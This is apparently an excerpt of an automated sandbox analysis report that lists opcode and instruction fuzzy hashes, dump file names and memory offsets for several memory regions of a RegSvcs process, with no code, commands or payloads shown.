                                                        • Opcode ID: 8e7228bf0fd9509d77558d548a6055fe0e992f29f264abffee8b91103f04fe0a
                                                        • Instruction ID: 81bc893d7a505f939c0c1ff56ed3050f1939fae2d79ec7bfe045948037256902
                                                        • Opcode Fuzzy Hash: 8e7228bf0fd9509d77558d548a6055fe0e992f29f264abffee8b91103f04fe0a
                                                        • Instruction Fuzzy Hash: 9ED0C7762142014BD244D944F551A96B7A1EBC4214F14CC1AD458D7755C626D847CA51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 645a70521ec1b0920f8ef60931bfb1c853e8b47e3b1547c7a881c86c339d97ba
                                                        • Instruction ID: 160001db8258263a7ed703fee17ace81953d3b4cf277fcf2e229a9b393739aa0
                                                        • Opcode Fuzzy Hash: 645a70521ec1b0920f8ef60931bfb1c853e8b47e3b1547c7a881c86c339d97ba
                                                        • Instruction Fuzzy Hash: F9D0A7311083915FE340CB58D840A67BB96FBD9308F28C85EF44243302CB61DC07C750
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2aa6e60769a61f497a3f04a18db0a1c6283bc4c2ecd3fbf89fca930473ed0181
                                                        • Instruction ID: 93aef9b1495d012096ea54b9af68dec1b5c58b23b2cc0fc5c5943e6794f60bdc
                                                        • Opcode Fuzzy Hash: 2aa6e60769a61f497a3f04a18db0a1c6283bc4c2ecd3fbf89fca930473ed0181
                                                        • Instruction Fuzzy Hash: D4D05E7420E2810FD301C324C8A6925FFA1DFC6200B08C0ED94C8CB266C92A9803D700
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98d2786b7d6e77fdfc1699c3713dd4096159a9f60a311cd03280ea6d676f1cf1
                                                        • Instruction ID: b8bb8b6ec96ebfce72c7e3dec425c4f1a5aa63b8ed4d79d79e9d4f2c8e28c1b1
                                                        • Opcode Fuzzy Hash: 98d2786b7d6e77fdfc1699c3713dd4096159a9f60a311cd03280ea6d676f1cf1
                                                        • Instruction Fuzzy Hash: 4CD0C7765081119FA604DE44E991C57B7F5EBC8710B14C44EF84153351DA67DC17C776
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b897a94eebbb73f2d9b83e1532ab4a0191b377ce66e93c6c502f58eb0727003
                                                        • Instruction ID: f7100f298961c2037ae35c9ea665a75cd68fac1c194fa4348d58c1d5d79dd6fc
                                                        • Opcode Fuzzy Hash: 6b897a94eebbb73f2d9b83e1532ab4a0191b377ce66e93c6c502f58eb0727003
                                                        • Instruction Fuzzy Hash: 18D0C776E412089BDB84DBE4E6016DEB7F5EF4621471006EA940CE7510E9325E146B45
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f999c461b85bc1016331b56a11f475d710efaf1d2ff999c430d6d9cfcf774331
                                                        • Instruction ID: 4c0ad1fb24b4bebe9751c7173f93df15f64b7e60a2f810dd63b6c786c4d80d3e
                                                        • Opcode Fuzzy Hash: f999c461b85bc1016331b56a11f475d710efaf1d2ff999c430d6d9cfcf774331
                                                        • Instruction Fuzzy Hash: 35D0A7B52082D05FD200CB68D940A66FB56FBC9204F14884EF89147301CA619C03C750
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf570285db0f15013c139e6fc7b94282f6c88b7106f627ddc9ee554e6d77bd74
                                                        • Instruction ID: 4917323d43847d5a998e76a1427f2a0d2542487143bc8de8af5f8c8e130b7faf
                                                        • Opcode Fuzzy Hash: bf570285db0f15013c139e6fc7b94282f6c88b7106f627ddc9ee554e6d77bd74
                                                        • Instruction Fuzzy Hash: F7D0C972A0124CAB8B40EFE8A90059EB7F9EB4A210B5045E69509E7610ED315A14AB92
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 631c86ddae723cec08a758d4ad33169806e74e1de316e57744e975c9f894a734
                                                        • Instruction ID: 3e8536657fe3b5dac7a56bb789167ee791bf9a30b55dd9809f71689e30a06a2f
                                                        • Opcode Fuzzy Hash: 631c86ddae723cec08a758d4ad33169806e74e1de316e57744e975c9f894a734
                                                        • Instruction Fuzzy Hash: BAD0C9B22011005BD608C614CC56B56A7E5DBD8760F28C42DA408CB394DE29E9438610
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 509703bf2033a7f9c26b797b942a5f29b7cd668fb090866e9433cf37b41242e7
                                                        • Instruction ID: 51f30139f22530badd24e74575ed7926494df14c48f150e4328b216a40a1c27e
                                                        • Opcode Fuzzy Hash: 509703bf2033a7f9c26b797b942a5f29b7cd668fb090866e9433cf37b41242e7
                                                        • Instruction Fuzzy Hash: F1D0C972A0120CAB8B40EFE8A90059EB7F9EB4A210B5045E69508E7610ED315A14AB92
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a6bd8f0c7aa5a19fa0c2500cc68d340dd4be3c90882511bb698dae771a6b883
                                                        • Instruction ID: 16733cea66453f7552f3989474bb74e8ad9b1320c48c68f64eaa7b73ecef5fc6
                                                        • Opcode Fuzzy Hash: 2a6bd8f0c7aa5a19fa0c2500cc68d340dd4be3c90882511bb698dae771a6b883
                                                        • Instruction Fuzzy Hash: B1D0C972A0120CAB8B40DFE9A90059EB7F9EB4A210B5045E6A508E7210ED315E14AB92
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d93c152672b9ab164059d6a23866ac1b8cfdcac7fb608fe6f98e670946ce5735
                                                        • Instruction ID: 171dcf83bff6ad80fe4870bd2bcebf353f549370cf23461859aa2ac79d499b8b
                                                        • Opcode Fuzzy Hash: d93c152672b9ab164059d6a23866ac1b8cfdcac7fb608fe6f98e670946ce5735
                                                        • Instruction Fuzzy Hash: 79D012741083805FC241DB64CC60896BB71AFC5224718898AD4A5872A3C6119906C761
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35953bd6ff7bf52509013985a6f64c64453313669b75eda857aa174505033f5f
                                                        • Instruction ID: ade73b76fffd921069ef53824e0a343af2f23f9bfdcd54988cebf06594d96e51
                                                        • Opcode Fuzzy Hash: 35953bd6ff7bf52509013985a6f64c64453313669b75eda857aa174505033f5f
                                                        • Instruction Fuzzy Hash: 96D0127B3000005FD208D508C853B59A7A1DBD4770F65C82DE448CB395DF39EC438700
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6b6073b6c575f0353fe4effda790f54a64940dc10aea4d23f4aa87289c4ce2f
                                                        • Instruction ID: a09b7ed703666a11e5ef2479debf6c2d33deabf1c6a649ec5d7cedb0de92d880
                                                        • Opcode Fuzzy Hash: a6b6073b6c575f0353fe4effda790f54a64940dc10aea4d23f4aa87289c4ce2f
                                                        • Instruction Fuzzy Hash: DDD012323400005BD208C514CC86B55A7A5DBC9370F64C02DE808CB394DE39DC43C710
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be7ff28980a155943d2093f6448f47c2b6d437d7c852b8fc01e0073d581cbb0d
                                                        • Instruction ID: d14e4cd53351c9d8e7560fcb76b1072255675b9f1e2c83cfc251b8d11f718b75
                                                        • Opcode Fuzzy Hash: be7ff28980a155943d2093f6448f47c2b6d437d7c852b8fc01e0073d581cbb0d
                                                        • Instruction Fuzzy Hash: 88D012773110005BC384C508D8D7BE7B7A5EBC8660F59C82DE448CB752EA31EC438655
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0f0c2f0f7ef3f022ee6715a11da0552d1f53e26d9918e1ad0f8b396231b0601
                                                        • Instruction ID: 99c3fdd88c889e54b219e8b5fe1adb5df3a0bba99f5e4bfd632275d32ca1f666
                                                        • Opcode Fuzzy Hash: e0f0c2f0f7ef3f022ee6715a11da0552d1f53e26d9918e1ad0f8b396231b0601
                                                        • Instruction Fuzzy Hash: 81D05E322081008BE300CE84FA01F49B792AFC4B20F54884EE54097791C62ADC57CA22
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5919a0ca3825314923de27ff4694ad35e1f9f85556e9acbd793d96e6708514ea
                                                        • Instruction ID: 1d3a3a00072c238ff489e0e737cd9f0d4b5ecdd3c3791c277e9b47bb05a78212
                                                        • Opcode Fuzzy Hash: 5919a0ca3825314923de27ff4694ad35e1f9f85556e9acbd793d96e6708514ea
                                                        • Instruction Fuzzy Hash: 98D0C9B1A0120DAB8B40EFE8A90059EB7E9DB4A210B1045E69509E7210EA315A14AB96
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3d23b0bf1926b6e956321568563cabab7da15614fba2fa6614bb203c490c7165
                                                        • Instruction ID: ce78d955f4b1c401c8d15a25f492fb1e4860349204f61a4e9bb6b330b51386a6
                                                        • Opcode Fuzzy Hash: 3d23b0bf1926b6e956321568563cabab7da15614fba2fa6614bb203c490c7165
                                                        • Instruction Fuzzy Hash: 52D0C9B2A000005BC2D8C608C956B25A7A1DBE4314F28C829A559C73A0EB61D8038A40
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9db8c048205c0d12c7bbd5845ada0541569b711680fbb170b70825a39736ba96
                                                        • Instruction ID: 0cda843bba0bba0a778a9d45ebb84bad815a96d5e8be3e02f8c728055572d94f
                                                        • Opcode Fuzzy Hash: 9db8c048205c0d12c7bbd5845ada0541569b711680fbb170b70825a39736ba96
                                                        • Instruction Fuzzy Hash: 1DD0A77460E2C00FC742D730C4A5415FF71DE47101719C8DEC099CF223C525990BD700
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e5f467fc4fa5857174d5928de33fabbd7ff9cb7c851654b5205c586f0200b64
                                                        • Instruction ID: 3e53b334e708aa6192129ff3d8ad539c56f3dc98d82d2b80f08d2e77856f03f4
                                                        • Opcode Fuzzy Hash: 5e5f467fc4fa5857174d5928de33fabbd7ff9cb7c851654b5205c586f0200b64
                                                        • Instruction Fuzzy Hash: 4FD0C77190120CAB8B40DFE4950059EB7F9DB4521075045E99504D7510ED315A146B95
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5607a3a9d57176bdf61ea922bca9ebcb974b04936a3bd8e5ecdb2c6951b672a7
                                                        • Instruction ID: ff504d6e87d8079d2b886edb9a30d702eb6c0952239b0ffc4fb99ec391bce1b1
                                                        • Opcode Fuzzy Hash: 5607a3a9d57176bdf61ea922bca9ebcb974b04936a3bd8e5ecdb2c6951b672a7
                                                        • Instruction Fuzzy Hash: 48D0235112C1801FD341C734CC575817FD4DE4311075CC9DAC044CF173C6159813D722
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4a00af261ae8daf2bdc2c20fc54f2a50be0bc0ec1868522f13a93256f3cf779
                                                        • Instruction ID: 2e0b7eb22f0a2c19068215be4db9c6915f4da940eaadcd1e72b560c761ee6329
                                                        • Opcode Fuzzy Hash: d4a00af261ae8daf2bdc2c20fc54f2a50be0bc0ec1868522f13a93256f3cf779
                                                        • Instruction Fuzzy Hash: E8D0C971A0120CAB8B40DFE8E90059EFBF9EB4A210B5046E69908E7210FE315A14AB96
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd4ff097781b26958759066956f09f29a844e77963296ace4986cb42c87727ad
                                                        • Instruction ID: 8ee8cf60f300f9bc596f03f3a8b0fdef5083ca8987f0bd1722b3fe04e3fac9d9
                                                        • Opcode Fuzzy Hash: cd4ff097781b26958759066956f09f29a844e77963296ace4986cb42c87727ad
                                                        • Instruction Fuzzy Hash: 39D012323140005BC294D518C887FEAB3E5DBC4610F14C42DE458CB750EF36DD438A86
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f09e02ca22274327442c6b86f996522ac1af788f4f4b74e5d229c03e456fcb9f
                                                        • Instruction ID: 7a233a4d4d7b5f6b94aabe6fbf2bd1bef4ae3dbf33b6df0aacf6fd16fba114ad
                                                        • Opcode Fuzzy Hash: f09e02ca22274327442c6b86f996522ac1af788f4f4b74e5d229c03e456fcb9f
                                                        • Instruction Fuzzy Hash: 60D0C972A0120CAB8B41DFE9E90059EB7E9DB4A210B1045E69508E7610EA325E14AB96
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ff93860ff58840559816d8aa82e8cb5315e5c71ec599cd125a3a51547881433
                                                        • Instruction ID: 010e3e60d1c1797f3a20bd47509d4c93588163f1ecbab0c9f4fd1c98aa60989d
                                                        • Opcode Fuzzy Hash: 4ff93860ff58840559816d8aa82e8cb5315e5c71ec599cd125a3a51547881433
                                                        • Instruction Fuzzy Hash: ADD0C77190120CAF8B40DFE4950059EB7F9DB4511075045E59508E7210ED315E14A792
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02e22b2f663fcefe2579b789725c7321145f3b6adcdefca8c71bfaf65775e0f3
                                                        • Instruction ID: e47618a98fad65cc095978e337176b741cfbb0e3d05b7245586aad0b759abc0a
                                                        • Opcode Fuzzy Hash: 02e22b2f663fcefe2579b789725c7321145f3b6adcdefca8c71bfaf65775e0f3
                                                        • Instruction Fuzzy Hash: 3AD052B2A142009BD284EA00E862B86B3A6FF84700F198C49E810A7710CA32C80B8BA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c00a87688cf8a06fdb3b2b9c2d789b67cbd054b2aefdd19db30b654bb5b51a7
                                                        • Instruction ID: 8b1e0dd1c4f361fc60f6eb72f2ce10d5af8a1e8df4bc4ca310c6eed994602b29
                                                        • Opcode Fuzzy Hash: 0c00a87688cf8a06fdb3b2b9c2d789b67cbd054b2aefdd19db30b654bb5b51a7
                                                        • Instruction Fuzzy Hash: B6D0C77190120CAB8B40DFE595005DEB7F9DB4515475145E59504D7510ED315A146791
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9af027bf82f684f5d76f6b3a9ebfff7838f31a67f360e9fced8fa84dac6c3c89
                                                        • Instruction ID: 3318add2c592c913c017b0b3f40a4e6124c59898d0893c075829c7f759fbaa23
                                                        • Opcode Fuzzy Hash: 9af027bf82f684f5d76f6b3a9ebfff7838f31a67f360e9fced8fa84dac6c3c89
                                                        • Instruction Fuzzy Hash: 1ED052A05142409BC3068F288842884FB70EF4B208716C0EAC840CA112DA31888BD320
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b9551fb62166321c57cd5edaab4b7c92c71905a1eac139a6319b5548bddc03f8
                                                        • Instruction ID: 0b4a2f6b239979371fa2fbceb73ab29b4bced68cff8142b0699a7e764eb058a1
                                                        • Opcode Fuzzy Hash: b9551fb62166321c57cd5edaab4b7c92c71905a1eac139a6319b5548bddc03f8
                                                        • Instruction Fuzzy Hash: B6C012357001148FC640AB7DE44884937E99F4966134100A5F505CB325DB219C0187D4
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4486c6b56d0fa740e0a810854ac5c422b60dca0b279f3a14f07873f1aa5235d
                                                        • Instruction ID: 7e59cd6bd052aac2fd2abb4e490b0731069228d60cae4b760e557af34efd45f9
                                                        • Opcode Fuzzy Hash: a4486c6b56d0fa740e0a810854ac5c422b60dca0b279f3a14f07873f1aa5235d
                                                        • Instruction Fuzzy Hash: 08D05E30A5120B9FCB004FA0D4049ECB7F1FF09320B0042A6E811AA260CA394C06CB00
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ef236c7b4f3288d935a6069da32278911e96556df1430176f954becc337096fd
                                                        • Instruction ID: 7deca0fd99315a65bcfe46fca791eb8c6892d99d8902e3d7cecd0fbda90b2b60
                                                        • Opcode Fuzzy Hash: ef236c7b4f3288d935a6069da32278911e96556df1430176f954becc337096fd
                                                        • Instruction Fuzzy Hash: 3CD0A72020E7804FC3029F148423446BF60AE471047A8C4D6D8C09F157EA219C17C310
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72dddad5d18cc18ccca9c095c3ff6013d173f543d7e12ea84a748f552b69b3d8
                                                        • Instruction ID: ccbe936ee3b2f9477440c32418ad0f15bb403164aac8e6ec9e292584299682a3
                                                        • Opcode Fuzzy Hash: 72dddad5d18cc18ccca9c095c3ff6013d173f543d7e12ea84a748f552b69b3d8
                                                        • Instruction Fuzzy Hash: 38D0C97190230CEF8B40DFA4E9005DEBBFDEB49210B1045E6D909D3310EA315E14AB92
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: afc12f9414060fdfad49ef750f3df279f5b774f31715f2fc1ed83b8541fc3d8c
                                                        • Instruction ID: 0cd89a95d52c1dd382d90bab91edebfb649386152afad056cf56efbc781d538a
                                                        • Opcode Fuzzy Hash: afc12f9414060fdfad49ef750f3df279f5b774f31715f2fc1ed83b8541fc3d8c
                                                        • Instruction Fuzzy Hash: 0ED09EB02182805FD345C725C86A811BBA5AB9521471AC1DF9489CB262D561DC06CB15
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 92474fff43793ec3f36414408e67beb500b9895fd840c131726f67d2df9c54f1
                                                        • Instruction ID: c6b49e416f7d7b466567b6285b9db82420607bd274b17e8014ac93559b8db626
                                                        • Opcode Fuzzy Hash: 92474fff43793ec3f36414408e67beb500b9895fd840c131726f67d2df9c54f1
                                                        • Instruction Fuzzy Hash: F7D0C971A0120CEB8B40DFE8A90059EB7E9DB4A210B1045E6E508E7210E9315E14AB92
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78263728b1d1bdfff5bf5d2f83de30163bd5f679cf9e5470f1bc7f20d583e335
                                                        • Instruction ID: a66a4fb6286347bea842841877db8dd7aa13490676fa407ca0ba69e5c0552fc1
                                                        • Opcode Fuzzy Hash: 78263728b1d1bdfff5bf5d2f83de30163bd5f679cf9e5470f1bc7f20d583e335
                                                        • Instruction Fuzzy Hash: C7D01274009241CFC701CF58D8124D0FB74EF4722831944E7DC80DE953CB219847E391
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2908d31c0e9d89a2bd9119901542d709613f87db4e04bb39d14d034c98f1ce4a
                                                        • Instruction ID: afe3c92ed78a72c5e1432e766fbb483da3fb1f42408dc2cff1324715879c86a2
                                                        • Opcode Fuzzy Hash: 2908d31c0e9d89a2bd9119901542d709613f87db4e04bb39d14d034c98f1ce4a
                                                        • Instruction Fuzzy Hash: 63C012B225540057D300DA54CE437C8F391E785220F68C425D008C7291DF3DD90B8751
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0575d18beb0baf003ee7c8a90cd23a04da0c1bca81ec45ea312c800366b89a23
                                                        • Instruction ID: 012e0e9ffd7f19ced9720afa2bc707b665db40f41158b0b849f3f0e73da3fd63
                                                        • Opcode Fuzzy Hash: 0575d18beb0baf003ee7c8a90cd23a04da0c1bca81ec45ea312c800366b89a23
                                                        • Instruction Fuzzy Hash: AFD0C96111E2C00FD302C7748DA74A5BFF2DE47104719C8D6D8889B277D526D817D715
                                                        Memory Dump Source
